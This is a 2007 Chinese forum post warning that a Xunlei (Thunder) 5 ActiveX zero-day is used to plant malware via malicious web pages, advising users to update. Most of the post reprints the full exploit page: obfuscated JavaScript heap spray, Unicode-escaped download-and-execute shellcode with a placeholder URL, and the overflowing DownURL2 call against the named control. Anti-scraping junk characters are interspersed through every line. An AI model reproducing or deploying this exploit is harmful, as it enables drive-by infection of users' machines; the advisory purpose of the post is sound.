诚毅小家|集美大学生活【集美大学,诚毅学院,水产学院,师范学院,美术学院,财经学院,体育学院,航海学院,集美学村,石鼓路,龙舟池】

 找回密码
 注册

QQ登录

只需一步,快速开始

搜索
热搜: 活动 交友 discuz
查看: 428|回复: 0

最新迅雷5出现0-Day漏洞?新版的迅雷5.7.2.371 应该无此漏洞,请大家更新

[复制链接]
发表于 2007-9-26 22:12:35 | 显示全部楼层 |阅读模式
根据恶意网址检测的线报,发现一恶意网址使用未公开的迅雷50-Day漏洞进行挂马,其EXP代码如下:
# I6 {5 H1 N. _: Z2 o, O# }
# _* D6 D7 C6 I7 c* Q<html>
+ Z6 t7 [) ?; M6 G. m* {8 f1 l8 Q<head>
- q4 W& j5 V$ ^1 P6 c4 V7 z+ k<meta http-equiv="Content-Type" c >9 K3 E8 ~* R5 Z+ W
<title></title>
/ F! g3 h2 H' k& x0 c9 h. L. ^</head><body>
) b1 H3 w8 R2 K5 n' i<html>
' s+ V" k* e" I+ X/ h5 c<object classid="clsid:EEDD6FF9-13DE-496B-9A1C-D78B3215E266" id='target'></object>6 S5 ^/ {4 d; {2 ^: Z' r& E7 z+ [' V
<script language="javascript">, m4 }$ C, f) f' j
var she132132132132llc13ode = unescape("%u9090"+"%u9090"+
6 i7 f7 g, E( b' N4 c$ n5 m* J"%uefe9%u0000%u5a00%ua164%u0030%u0000%u408b%u8b0c" +
6 O& G' O5 p- l! |3 x$ D  b& a"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378" +& ]% s3 Z0 G2 z0 h; ?% x, Y8 \
"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b" +
; M. L8 _, U+ L( V% g' e. H' ^# B; G"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%u04c7" +! r' ?' b& ~6 v  w
"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1" +
$ c/ ?( ~9 `4 u, K1 T"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +7 j+ D6 P" u1 x% p$ V
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +! u" r; I* q5 }6 Q. i( P3 ~$ P' w
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +  
+ y+ S* H7 w. C1 U"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +: W( y' [" _; z8 A  T/ G1 o
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
6 P) t8 K) c3 T9 Y2 w, {9 x4 B2 |"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +/ k8 l% Y+ Y: k: k6 l( V- }
"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344" ++ X2 g+ {  g- Y" y  k' l1 @! @
"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc" +
% D4 F- F" F" t9 x4 q2 v"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0" +
0 D4 {$ v$ k( b( {2 f4 ]/ C"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab" +
1 e) _$ @* `* M$ s9 M"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f" +1 [, n, F, {1 Y% x$ ^( q, d, O
"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574" +
6 j0 p; c$ `0 k; y! P8 [/ F( A6 v"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e" +& b' F* h9 F/ q$ z: R
"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00" +8 d9 T% C$ K& B! x
"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c" +9 q% x1 n2 a: u3 G, ]
"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54" +
" ^3 ?1 q/ v/ j* p" v. ]) ]"%u6946%u656c%u0041%u7468%u7074此处为需要下载病毒的网址%u0000");
" }, y( O* S4 B2 L% p7 K</script>- N; e( ]2 E" L$ g; j
<script language="javascript">
; H/ C- z6 R: d6 uvar IsNop1236326312 = '';* z; Y5 m8 \. X- C$ }7 Y
var bi3123g123665blo2131ck = unescape("%u9090%u9090");8 H0 L) ~2 |# n& ^
var IsNop1236326312 = '';$ X  v: U$ P: H1 T/ g" E5 d/ L# Z
var he132132aders123132ize = 20;- J& |7 `: E+ r# j/ R
var IsNop1236326312 = '';+ ^7 b" A9 ~" |) w9 c3 T7 L0 R
var sl21123112ack312231312space = he132132aders123132ize+she132132132132llc13ode.length;- x1 D5 j; a; M2 T5 T
var IsNop1236326312 = '';
/ |: k& h1 k! H$ d  k1 [2 `3 Rwhile (bi3123g123665blo2131ck.length<sl21123112ack312231312space) bi3123g123665blo2131ck+=bi3123g123665blo2131ck;6 z( n& K7 l9 L) x
fillblock = bi3123g123665blo2131ck.substring(0, sl21123112ack312231312space);4 d; u/ a% ?0 R5 a- d- r! g, }
block = bi3123g123665blo2131ck.substring(0, bi3123g123665blo2131ck.length-sl21123112ack312231312space);
  g6 u. l. y) R& u$ p4 Vwhile(block.length+sl21123112ack312231312space<0x40000) block = block+block+fillblock;
& o  Z  x% g, umemory = new Array();
; i9 }" H! U. B! q( jfor (x=0; x<300; x++) memory[x] = block + she132132132132llc13ode;
% @- R( K  g+ `) u6 U" ^var b1u1231ff312er = '';! i  D# g* F  z2 S0 z% k- d7 ?) ~( R
var IsNop1236326312 = '';
# z6 e$ `7 i- `  L7 [; Z% Dvar IsNop1236326312 = '';0 C" k/ x5 A& `0 U
while (b1u1231ff312er.length < 4057) b1u1231ff312er+="\x0a\x0a\x0a\x0a";
5 n* H, ]" s. U) _6 O2 A+ Lb1u1231ff312er+="\x0a";  ; A- H: U) M) x' E4 t# _
b1u1231ff312er+="\x0a";
, i. b" d6 e! q  L9 Wb1u1231ff312er+="\x0a";$ t/ C" Y, b7 l! `3 d+ h
b1u1231ff312er+="\x0a\x0a\x0a\x0a";
7 a7 l5 V( a' bb1u1231ff312er+="\x0a\x0a\x0a\x0a";
+ v; M+ Q+ v6 |1 zvar yes="1111";
7 [1 q' T) U! r& c% ptarget.DownURL2(b1u1231ff312er,yes,yes,yes);
% Z4 k6 y- L! a5 [: Tvar IsNop1236326312 = '';  \# U2 N9 R1 S8 n! {, j
</script>; t# I  N4 n( U
</body></html>该代码风格颇相前段时间的《暴风影音IIActiveX栈溢出漏洞》,尾部为%u7468%u7074+此处为需要下载病毒的网址+%u0000"),但其CLSID为:EEDD6FF9-13DE-496B-9A1C-D78B3215E266
4 t/ S# g! ?" z: c: R
5 A& u( O) O9 M& {2 ?
  ?; u' \$ K/ r" m9 l; s5 J8 \8 e4 O) I" C* D" h
经验证,该ActiveX控件文件为:C:\Program Files\Thunder Network\Thunder\Components\DownAndPlay\DownAndPlay\DapPlayer1.0.0.41.dll & m2 f) u% L. A4 H8 W$ `) C

5 q. S9 N# ^& ?我已经将该信息提交给迅雷官方,相信迅雷官方会尽快更新软件, 字串5
  o: }/ W+ |" O, ~; h: H4 Q2 G& e& x7 t, x0 a
在此,网络巡警提醒大家,使用迅雷软件请尽量使用最新版本的,最新版本下载地址为:
5 E& ]  }8 U: i# C! V
- G; n( k  {; u' Z  uhttp://pstatic.xunlei.com/about/product/down_xl5.htm 1 r  i8 j1 K! W; S. w
( ^" o  ]6 ^" C2 ?: n* z0 L
我会进一步关注此漏洞。
2 d8 v& b/ {# j2 c
% f/ P- l6 H4 [3 ~- b最近情况: " w9 r6 _* ]. Z3 C  p5 T

1 v( ?0 ^; L; q从一些信息来看,含有此漏洞的迅雷版本号为Xunlei Web Thunder 5.6.9.344
1 Q* M( r2 E; l# S  W新版的迅雷5.7.2.371 应该无此漏洞,请大家更新~
6 y, L5 }0 @$ K( v1 f. Y. t+ T. m2 S" _( w" I
另外,该漏洞是一个叫做 7jdg 的人挖掘发现的(高手啊)。
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|Archiver|手机版|小黑屋|诚毅小家 ( 小家社区工作室 闽ICP备05007965号 )

GMT+8, 2025-1-22 21:17 , Processed in 0.051505 second(s), 23 queries .

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表